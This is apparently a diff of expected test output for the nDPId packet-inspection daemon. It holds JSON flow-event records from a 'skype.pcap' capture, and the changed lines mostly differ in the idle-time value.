+00640{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":143,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431969675056,"flow_last_seen":1431969702873,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":276,"flow_avg_l4_payload_len":19,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.47","src_port":50058,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00583{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":143,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431969675056,"flow_last_seen":1431969702873,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":276,"flow_avg_l4_payload_len":19,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.47","src_port":50058,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00640{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":153,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1431969677018,"flow_last_seen":1431969694645,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":421,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.38","src_port":50063,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00583{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":153,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1431969677018,"flow_last_seen":1431969694645,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":421,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.38","src_port":50063,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":238,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1431969713814,"flow_last_seen":1431969726846,"flow_idle_time":180000,"flow_min_l4_payload_len":165,"flow_max_l4_payload_len":165,"flow_tot_l4_payload_len":660,"flow_avg_l4_payload_len":165,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00641{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":212,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1431969697097,"flow_last_seen":1431969714913,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.142","src_port":50087,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":212,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1431969697097,"flow_last_seen":1431969714913,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.142","src_port":50087,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00640{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":223,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1431969706277,"flow_last_seen":1431969719939,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":243,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.46","src_port":50100,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00583{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":223,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1431969706277,"flow_last_seen":1431969719939,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":243,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.46","src_port":50100,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00641{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":212,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1431969697097,"flow_last_seen":1431969714913,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.142","src_port":50087,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":212,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1431969697097,"flow_last_seen":1431969714913,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.142","src_port":50087,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00640{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":223,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1431969706277,"flow_last_seen":1431969719939,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":243,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.46","src_port":50100,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00583{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":223,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1431969706277,"flow_last_seen":1431969719939,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":243,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.46","src_port":50100,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":121,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1431969668503,"flow_last_seen":1431969788519,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":220,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"192.168.1.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Spotify","breed":"Acceptable","category":"Music"}} 00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":272,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1431969728749,"flow_last_seen":1431969734854,"flow_idle_time":180000,"flow_min_l4_payload_len":433,"flow_max_l4_payload_len":513,"flow_tot_l4_payload_len":6693,"flow_avg_l4_payload_len":478,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"239.255.255.250","src_port":50084,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969659392,"flow_last_seen":1431969659392,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.18","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} -00585{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969643093,"flow_last_seen":1431969698671,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":185,"flow_tot_l4_payload_len":2405,"flow_avg_l4_payload_len":141,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"23.206.33.166","src_port":50029,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431969649862,"flow_last_seen":1431969790906,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":954,"flow_tot_l4_payload_len":4924,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"108.160.170.46","dst_ip":"192.168.1.34","src_port":443,"dst_port":49445,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Dropbox","breed":"Acceptable","category":"Cloud"}} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431969649862,"flow_last_seen":1431969790906,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":954,"flow_tot_l4_payload_len":4924,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"108.160.170.46","dst_ip":"192.168.1.34","src_port":443,"dst_port":49445,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00585{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969643093,"flow_last_seen":1431969698671,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":185,"flow_tot_l4_payload_len":2405,"flow_avg_l4_payload_len":141,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"23.206.33.166","src_port":50029,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431969649862,"flow_last_seen":1431969790906,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":954,"flow_tot_l4_payload_len":4924,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"108.160.170.46","dst_ip":"192.168.1.34","src_port":443,"dst_port":49445,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Dropbox","breed":"Acceptable","category":"Cloud"}} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431969649862,"flow_last_seen":1431969790906,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":954,"flow_tot_l4_payload_len":4924,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"108.160.170.46","dst_ip":"192.168.1.34","src_port":443,"dst_port":49445,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":293,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1431969793871,"flow_last_seen":1431969802019,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":55893,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1431969642318,"flow_last_seen":1431969642376,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":64085,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"}} -00601{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":244,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431969714398,"flow_last_seen":1431969733216,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":107,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"71.238.7.203","src_port":50113,"dst_port":18767,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00585{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":244,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431969714398,"flow_last_seen":1431969733216,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":107,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"71.238.7.203","src_port":50113,"dst_port":18767,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00601{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":244,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431969714398,"flow_last_seen":1431969733216,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":107,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"71.238.7.203","src_port":50113,"dst_port":18767,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00585{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":244,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431969714398,"flow_last_seen":1431969733216,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":107,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"71.238.7.203","src_port":50113,"dst_port":18767,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":265,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431969721954,"flow_last_seen":1431969748263,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":252,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":51802,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00599{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":253,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1431969717177,"flow_last_seen":1431969730486,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":95,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":17,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"80.14.46.121","src_port":50123,"dst_port":4415,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00583{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":253,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1431969717177,"flow_last_seen":1431969730486,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":95,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":17,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"80.14.46.121","src_port":50123,"dst_port":4415,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00637{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":248,"flow_state":"finished","flow_packets_processed":43,"flow_first_seen":1431969715510,"flow_last_seen":1431969755612,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1024,"flow_tot_l4_payload_len":2898,"flow_avg_l4_payload_len":67,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"71.238.7.203","src_port":50117,"dst_port":18767,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Unknown","breed":"Unrated"}} -00599{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":258,"flow_state":"info","flow_packets_processed":27,"flow_first_seen":1431969718289,"flow_last_seen":1431969752365,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":67,"flow_tot_l4_payload_len":292,"flow_avg_l4_payload_len":10,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"80.14.46.121","src_port":50127,"dst_port":4415,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00583{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":258,"flow_state":"info","flow_packets_processed":27,"flow_first_seen":1431969718289,"flow_last_seen":1431969752365,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":67,"flow_tot_l4_payload_len":292,"flow_avg_l4_payload_len":10,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"80.14.46.121","src_port":50127,"dst_port":4415,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00599{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":253,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1431969717177,"flow_last_seen":1431969730486,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":95,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":17,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"80.14.46.121","src_port":50123,"dst_port":4415,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00583{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":253,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1431969717177,"flow_last_seen":1431969730486,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":95,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":17,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"80.14.46.121","src_port":50123,"dst_port":4415,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00637{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":248,"flow_state":"finished","flow_packets_processed":43,"flow_first_seen":1431969715510,"flow_last_seen":1431969755612,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1024,"flow_tot_l4_payload_len":2898,"flow_avg_l4_payload_len":67,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"71.238.7.203","src_port":50117,"dst_port":18767,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Unknown","breed":"Unrated"}} +00599{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":258,"flow_state":"info","flow_packets_processed":27,"flow_first_seen":1431969718289,"flow_last_seen":1431969752365,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":67,"flow_tot_l4_payload_len":292,"flow_avg_l4_payload_len":10,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"80.14.46.121","src_port":50127,"dst_port":4415,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00583{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":258,"flow_state":"info","flow_packets_processed":27,"flow_first_seen":1431969718289,"flow_last_seen":1431969752365,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":67,"flow_tot_l4_payload_len":292,"flow_avg_l4_payload_len":10,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"80.14.46.121","src_port":50127,"dst_port":4415,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":79,"flow_first_seen":1431969648258,"flow_last_seen":1431969808391,"flow_idle_time":180000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":363,"flow_tot_l4_payload_len":26161,"flow_avg_l4_payload_len":331,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.0.254","dst_ip":"239.255.255.250","src_port":1025,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":109,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969666429,"flow_last_seen":1431969666429,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.155","src_port":13021,"dst_port":40004,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} -00599{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":286,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969783628,"flow_last_seen":1431969808684,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":99,"flow_tot_l4_payload_len":223,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"80.14.46.121","src_port":50141,"dst_port":4415,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00583{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":286,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969783628,"flow_last_seen":1431969808684,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":99,"flow_tot_l4_payload_len":223,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"80.14.46.121","src_port":50141,"dst_port":4415,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00599{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":286,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969783628,"flow_last_seen":1431969808684,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":99,"flow_tot_l4_payload_len":223,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"80.14.46.121","src_port":50141,"dst_port":4415,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00583{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":286,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969783628,"flow_last_seen":1431969808684,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":99,"flow_tot_l4_payload_len":223,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"80.14.46.121","src_port":50141,"dst_port":4415,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 